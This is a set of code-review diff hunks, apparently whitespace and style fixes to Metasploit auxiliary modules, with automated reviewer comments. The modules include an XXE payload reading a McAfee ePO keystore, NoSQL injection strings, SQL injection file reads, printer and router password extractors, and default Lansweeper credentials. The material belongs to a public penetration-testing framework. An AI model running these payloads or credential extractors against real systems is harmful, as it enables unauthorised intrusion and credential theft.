]
)
end
def check
@@ -121,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
colc = request(query, payload, lmark, rmark)
vprint_status(colc)
valid_cols = [ # joomla_users
valid_cols = [ # joomla_users
'activation',
'block',
'email',
@@ -151,6 +153,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
break if value.blank?
record[col] << value
l += 54
end
@@ -179,12 +182,14 @@ class MetasploitModule < Msf::Auxiliary
tables.each do |table|
cols = query_columns(db, table, payload, lmark, rmark)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
'joomla.users'
)
print_good('Saved file to: ' + path)
end
end
@@ -7,38 +7,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
'Description' => %q{
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
which allows an attacker to access the database or read arbitrary files as the
'mysql' user. This module will only work if the mysql user Joomla is using
to access the database has the LOAD_FILE permission.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
super(
update_info(
info,
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
'Description' => %q{
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
which allows an attacker to access the database or read arbitrary files as the
'mysql' user. This module will only work if the mysql user Joomla is using
to access the database has the LOAD_FILE permission.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
],
'References' =>
[
'References' => [
['EDB', '31459'],
['URL', 'http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html']
],
'DisclosureDate' => '2014-03-02'
))
'DisclosureDate' => '2014-03-02'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
])
]
)
end
def check
front_marker = Rex::Text.rand_text_alpha(6)
back_marker = Rex::Text.rand_text_alpha(6)
@@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE
)
)
end
def run
@@ -3,28 +3,28 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q{
This module will extract FTP and SMB account usernames and passwords
from Konica Minolta multifunction printer (MFP) devices. Tested models include
C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
},
'Author' =>
[
'Author' => [
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('PASSWD', [true, 'The default Admin password', '12345678']),
OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])
])
]
)
end
# Creates the XML data to be sent that will extract AuthKey
@@ -45,13 +46,13 @@ class MetasploitModule < Msf::Auxiliary
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
xml.send('SOAP-ENV:Header'){
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
xml.send('SOAP-ENV:Header') {
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
xml.send('UserName', 'xmlns' => '') { xml.text '' }
xml.send('Password', 'xmlns' => '') { xml.text '' }
xml.send('Version', 'xmlns' => ''){
xml.send('Version', 'xmlns' => '') {
xml.send('Major') { xml.text "#{major}" }
xml.send('Minor') { xml.text "#{minor}" }
}
@@ -59,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
}
}
xml.send('SOAP-ENV:Body') {
xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
xml.send('OperatorInfo'){
xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
xml.send('OperatorInfo') {
xml.send('UserType') { xml.text "#{user}" }
xml.send('Password') { xml.text "#{passwd}" }
}
@@ -78,30 +79,30 @@ class MetasploitModule < Msf::Auxiliary
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
xml.send('SOAP-ENV:Header'){
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
xml.send('SOAP-ENV:Header') {
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
xml.send('UserName', 'xmlns' => '') { xml.text '' }
xml.send('Password', 'xmlns' => '') { xml.text '' }
xml.send('Version', 'xmlns' => ''){
xml.send('Version', 'xmlns' => '') {
xml.send('Major') { xml.text "#{major}" }
xml.send('Minor') { xml.text "#{minor}" }
}
xml.send('AppManagementID', 'xmlns' => '') { xml.text '1000' }
}
}
xml.send('SOAP-ENV:Body'){
xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
xml.send('OperatorInfo'){
xml.send('SOAP-ENV:Body') {
xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
xml.send('OperatorInfo') {
xml.send('AuthKey') { xml.text "#{authkey}" }
}
xml.send('AbbrListCondition'){
xml.send('AbbrListCondition') {
xml.send('SearchKey') { xml.text 'None' }
xml.send('WellUse') { xml.text 'false' }
xml.send('ObtainCondition'){
xml.send('WellUse') { xml.text 'false' }
xml.send('ObtainCondition') {
xml.send('Type') { xml.text 'OffsetList' }
xml.send('OffsetRange'){
xml.send('OffsetRange') {
xml.send('Start') { xml.text '1' }
xml.send('Length') { xml.text '100' }
}
@@ -124,11 +125,12 @@ class MetasploitModule < Msf::Auxiliary
# Validate XML Major Minor version
def version
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
@@ -140,9 +142,8 @@ class MetasploitModule < Msf::Auxiliary
minor = ("#{minor_parse}")
login(major, minor)
end
rescue ::Rex::ConnectionError
print_error("Version check Connection failed")
rescue ::Rex::ConnectionError
print_error("Version check Connection failed")
end
# This section logs on and retrieves AuthKey token
@@ -151,11 +152,12 @@ class MetasploitModule < Msf::Auxiliary
# Send post request with crafted XML to login and retrieve AuthKey
begin
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => authreq_xml.to_xml
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => authreq_xml.to_xml
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
@@ -178,11 +180,12 @@ class MetasploitModule < Msf::Auxiliary
# Send post request with crafted XML as data
begin
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => smbreq_xml.to_xml
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => smbreq_xml.to_xml
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
@@ -8,40 +8,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Lansweeper Credential Collector',
'Description' => %q(
Lansweeper stores the credentials it uses to scan the computers
in its Microsoft SQL database. The passwords are XTea-encrypted with a
68 character long key, in which the first 8 characters are stored with
the password in the database and the other 60 is static. Lansweeper, by
default, creates an MSSQL user "lansweeperuser" with the password is
"mysecretpassword0*", and stores its data in a database called
"lansweeperdb". This module will query the MSSQL database for the
credentials.
),
'Author' =>
[
super(
update_info(
info,
'Name' => 'Lansweeper Credential Collector',
'Description' => %q{
Lansweeper stores the credentials it uses to scan the computers
in its Microsoft SQL database. The passwords are XTea-encrypted with a
68 character long key, in which the first 8 characters are stored with
the password in the database and the other 60 is static. Lansweeper, by
default, creates an MSSQL user "lansweeperuser" with the password is
"mysecretpassword0*", and stores its data in a database called
"lansweeperdb". This module will query the MSSQL database for the
credentials.
},
'Author' => [
'sghctoma <tamas.szakaly[at]praudit.hu>', # Lansweeper RCE + Metasploit implementation
'eq <balazs.bucsay[at]praudit.hu>', # Lansweeper RCE + discovering default credentials
'calderpwn <calderon[at]websec.mx>' # Module for lansweeper (5.3.0.8)
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'License' => MSF_LICENSE,
'DefaultOptions' => {
'USERNAME' => 'lansweeperuser',
'PASSWORD' => 'mysecretpassword0*'
},
'References' =>
[
'References' => [
['URL', 'http://www.lansweeper.com'],
['URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
]))
]
)
)
register_options([
OptString.new('DATABASE', [true, 'The Lansweeper database', 'lansweeperdb'])
])
end
def uint32(n)
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
result[:rows].each do |row|""
result[:rows].each do |row|
pw = lsw_decrypt(row[2])
print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
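Review bot: The positional indexes on the lines after the corrected `each` line (`row[0]`, `row[1]`, and `row[2]` handed to `lsw_decrypt`) are only meaningful relative to the column order of the query that presumably produced `result`, which is issued outside this hunk, and nothing at the loop says so. A one-line comment above the loop would make that coupling explicit, e.g. `# each row follows the SELECT column order: credential name, username, XTea-encrypted password`. The enclosing method starts and ends outside the hunk, so the query itself could not be checked here.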
@@ -6,38 +6,40 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
an attacker can gain access to administrative credentials.
def initialize(info = {})
super(
update_info(
info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
an attacker can gain access to administrative credentials.
This vuln was fixed in 1.2.17.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jakub Galczyk', #initial discovery
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
This vuln was fixed in 1.2.17.
},
'License' => MSF_LICENSE,
'Author' => [
'Jakub Galczyk', # initial discovery
'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
],
'References' =>
[
'References' => [
['CVE', '2014-2238'],
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17055']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => '2014-02-28'))
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => '2014-02-28'
)
)
register_options(
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
OptString.new('PASSWORD', [ true, 'Single password', 'root']),
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
])
]
)
end
def run
@@ -9,39 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure',
'Description' => %q{
This module will exploit an authenticated XXE vulnerability to read the keystore.properties
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
super(
update_info(
info,
'Name' => 'McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure',
'Description' => %q{
This module will exploit an authenticated XXE vulnerability to read the keystore.properties
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Any user account can be used to exploit this, all that is needed is a valid credential.
Any user account can be used to exploit this, all that is needed is a valid credential.
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #metasploit module
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # metasploit module
],
'References' =>
[
'References' => [
['CVE', '2015-0921'],
['CVE', '2015-0922'],
['URL', 'https://seclists.org/fulldisclosure/2015/Jan/8']
],
'DisclosureDate' => '2015-01-06'
))
'DisclosureDate' => '2015-01-06'
)
)
register_options(
[
@@ -50,15 +51,16 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [ true, "Base ePO directory path", '/']),
OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
])
]
)
end
def run
key = "\x5E\x9C\x3E\xDF\xE6\x25\x84\x36\x66\x21\x93\x80\x31\x5A\x29\x33" #static key used
key = "\x5E\x9C\x3E\xDF\xE6\x25\x84\x36\x66\x21\x93\x80\x31\x5A\x29\x33" # static key used
aes = OpenSSL::Cipher.new('AES-128-ECB') # ecb, bad bad tsk
aes.decrypt
aes.padding=1
aes.padding = 1
aes.key = key
res = send_request_cgi({
@@ -102,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
cookie = res.get_cookies
#This vuln requires a bit of setup before we can exploit it
# This vuln requires a bit of setup before we can exploit it
print_status("Setting up environment for exploitation")
@@ -202,7 +204,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Sending payload...")
filepath = "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///'+filepath+'" >]><conditions><condition grouping="or"><prop-key>OrionTaskLogTaskMessage.Message</prop-key><op-key>eq</op-key><value>&xxe;</value></condition></conditions>'
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///' + filepath + '" >]><conditions><condition grouping="or"><prop-key>OrionTaskLogTaskMessage.Message</prop-key><op-key>eq</op-key><value>&xxe;</value></condition></conditions>'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'core', 'orionUpdateTableFilter.do'),
+23 -15
@@ -9,20 +9,21 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'Memcached Extractor',
'Description' => %q(
This module extracts the slabs from a memcached instance. It then
finds the keys and values stored in those slabs.
),
'Author' => [ 'Paul Deardorff <paul_deardorff[at]rapid7.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
super(
update_info(
info,
'Name' => 'Memcached Extractor',
'Description' => %q{
This module extracts the slabs from a memcached instance. It then
finds the keys and values stored in those slabs.
},
'Author' => [ 'Paul Deardorff <paul_deardorff[at]rapid7.com>' ],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/memcached/memcached/blob/master/doc/protocol.txt']
]
))
)
)
register_options(
[
@@ -58,8 +59,10 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
matches = data.scan(/^ITEM (?<key>.*) \[/)
break if matches.empty?
keys = keys + matches.flatten!
break if data =~ /^END/
end
@@ -74,6 +77,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0
matches = data.scan(/^STAT (?<slab_id>(\d)*):/)
slab_ids << matches
break if data =~ /^END/
@@ -88,10 +92,13 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
matches = data.scan(/^key=(?<key>.*) exp=/)
break if matches.empty?
keys = keys + matches.flatten!
break if data =~ /^END/
data = ''
end
keys
@@ -105,6 +112,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
data_part = sock.recv(4096)
break if !data_part || data_part.length == 0
data << data_part
break if data_part =~ /^END/
end
@@ -149,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary
print_error("unable to determine memcached protocol version")
return
end
if(command_string=='cachedump')
if (command_string == 'cachedump')
keys = enumerate_keys
else
keys = enumerate_keys_lru
@@ -159,8 +167,8 @@ class MetasploitModule < Msf::Auxiliary
data = data_for_keys(keys)
result_table = Rex::Text::Table.new(
'Header' => "Keys/Values Found for #{peer}",
'Indent' => 1,
'Header' => "Keys/Values Found for #{peer}",
'Indent' => 1,
'Columns' => [ 'Key', 'Value' ]
)
data.take(print_keys).each { |key, value| result_table << [key, value.inspect] }
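Review bot: `if (command_string == 'cachedump')` keeps the parentheses around the condition after the spacing fix; Ruby convention writes conditions without them, and since both branches only assign `keys` the whole if/else collapses to `keys = command_string == 'cachedump' ? enumerate_keys : enumerate_keys_lru`. The enclosing `run` method starts and ends outside this hunk.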
@@ -7,36 +7,41 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' =>
['Brandon Perry <bperry.volatile[at]gmail.com>'],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' => ['Brandon Perry <bperry.volatile[at]gmail.com>'],
'References' => [
['URL', 'https://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-nodejs-server-side#_=_']
],
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => '2014-06-07'))
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => '2014-06-07'
)
)
register_options(
register_options(
[
OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
])
]
)
end
def syntaxes
[["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"','"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this","||[inject]"]]
[
["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"', '"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this", "||[inject]"]
]
end
def run
@@ -120,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
name = ''
(0...name_len).each do |k|
[*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
[*('a'..'z'), *('0'..'9'), *('A'..'Z'), '.'].each do |c|
str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
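Review bot: The candidate-character array `[*('a'..'z'), *('0'..'9'), *('A'..'Z'), '.']` is rebuilt on every pass of the enclosing `(0...name_len).each` loop (and of whichever outer loop supplies `i`), although it never changes; hoist it to a frozen constant such as `CHARSET = [*('a'..'z'), *('0'..'9'), *('A'..'Z'), '.'].freeze` and iterate `CHARSET.each do |c|`. The enclosing `run` method starts and ends outside this hunk.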
+20 -19
@@ -3,36 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file path should look like this:
c:\\\\windows\\\\system32\\\\calc.exe
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file path should look like this:
c:\windows\system32\calc.exe
},
'License' => MSF_LICENSE,
'Author' => [
'Soroush Dalili', # @irsdl - Original discovery. MSF module is from his PoC
'sinn3r'
],
'References' =>
[
'References' => [
[ 'CVE', '2013-7331'],
[ 'MSB', 'MS14-052' ],
[ 'URL', 'https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/' ],
[ 'URL', 'http://web.archive.org/web/20240814143555/https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi' ]
],
'Platform' => 'win',
'DisclosureDate' => '2014-09-09', # MSB. Used in the wild since Feb 2014
))
'Platform' => 'win',
# MSB. Used in the wild since Feb 2014
'DisclosureDate' => '2014-09-09',
)
)
register_options(
[
@@ -167,7 +168,7 @@ class MetasploitModule < Msf::Auxiliary
unless files.empty?
print_good("We have detected the following files:")
files.each do |f|
report_note(host: cli.peerhost, type: 'ie.filenames', data: {:filename => f })
report_note(host: cli.peerhost, type: 'ie.filenames', data: { :filename => f })
print_good(f)
end
end
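Review bot: The example path in the description is a user-visible text change, not a layout fix: inside `%q{}` only `\\` is an escape, so the old `c:\\\\windows\\\\system32\\\\calc.exe` rendered as `c:\\windows\\system32\\calc.exe`, while the new `c:\windows\system32\calc.exe` renders exactly as written. The description tells users how each entry of their file-path list "should look", so if the doubled backslashes were the intended input format (plausibly because the paths end up inside a JavaScript string literal, which this hunk does not show), the text now gives the wrong format. Either restore the doubled form or confirm the single-backslash form is what the module expects before merging this as a pure style change.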
+60 -56
@@ -7,73 +7,76 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'MyBB Database Fingerprint',
'Description' => %q{
This module checks if MyBB is running behind an URL. Also uses a malformed query to
force an error and fingerprint the backend database used by MyBB on version 1.6.12
and prior.
},
'Author' =>
[
#http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
super(
update_info(
info,
'Name' => 'MyBB Database Fingerprint',
'Description' => %q{
This module checks if MyBB is running behind an URL. Also uses a malformed query to
force an error and fingerprint the backend database used by MyBB on version 1.6.12
and prior.
},
'Author' => [
# http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-13'))
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-13'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
])
]
)
end
def check
begin
uri = normalize_uri(target_uri.path, 'index.php')
res = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'intcheck' => 1
begin
uri = normalize_uri(target_uri.path, 'index.php')
res = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'intcheck' => 1
}
})
}
)
if res.nil? || res.code != 200
if res.nil? || res.code != 200
return Exploit::CheckCode::Unknown
end
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
else
php_version = "PHP version unknown"
end
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
else
web_server = "unknown web server"
end
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
rescue
return Exploit::CheckCode::Unknown
end
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
else
php_version = "PHP version unknown"
end
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
else
web_server = "unknown web server"
end
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
rescue
return Exploit::CheckCode::Unknown
end
end
def run
print_status("Checking MyBB...")
unless check == Exploit::CheckCode::Detected
@@ -85,12 +88,13 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'memberlist.php')
response = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'letter' => -1
}
})
}
}
)
if response.nil?
print_error("Timeout...")
return
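Review bot: In `check`, the `begin … rescue … end` wrapping the whole method body is redundant (a `def` body can carry `rescue` directly), and the bare `rescue` maps every StandardError, including coding errors in the parsing below it, to `CheckCode::Unknown`; rescuing only the transport errors the module actually expects (the usual candidates here are `Rex::ConnectionError` and `Timeout::Error`, to be confirmed against the framework) would keep real bugs visible. `php_version = "#{php_version}"` and `web_server = "#{web_server}"` are no-op interpolations; `php_version ||= 'PHP version unknown'` and `web_server ||= 'unknown web server'` express the intent in one line each. The later `run` hunk leaves the same `if response.nil?` three-line guard that reads better as `return print_error("Timeout...") if response.nil?`.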
@@ -12,12 +12,11 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'NAT-PMP External Address Scanner',
'Name' => 'NAT-PMP External Address Scanner',
'Description' => 'Scan NAT devices for their external address using NAT-PMP',
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
end
def scan_host(ip)
@@ -37,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
# report its external address as alive
if inside_workspace_boundary?(external_address)
report_host(
:host => external_address,
:host => external_address,
:state => Msf::HostState::Alive
)
end
@@ -47,17 +46,17 @@ class MetasploitModule < Msf::Auxiliary
# report the host we scanned as alive
report_host(
:host => shost,
:host => shost,
:state => Msf::HostState::Alive
)
# report NAT-PMP as being open
report_service(
:host => shost,
:port => sport,
:proto => 'udp',
:name => 'natpmp',
:state => Msf::ServiceState::Open
:host => shost,
:port => sport,
:proto => 'udp',
:name => 'natpmp',
:state => Msf::ServiceState::Open
)
end
end
@@ -7,24 +7,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR Administrator Password Disclosure',
'Description' => %q{
This module will collect the password for the `admin` user.
The exploit will not complete if password recovery is set on the router.
The password is received by passing the token generated from `unauth.cgi`
to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
products. The full list of affected products is available in the 'References'
section.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'NETGEAR Administrator Password Disclosure',
'Description' => %q{
This module will collect the password for the `admin` user.
The exploit will not complete if password recovery is set on the router.
The password is received by passing the token generated from `unauth.cgi`
to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
products. The full list of affected products is available in the 'References'
section.
},
'Author' => [
'Simon Kenin', # Vuln Discovery, PoC
'thecarterb' # Metasploit module
'thecarterb' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2017-5521' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18758' ],
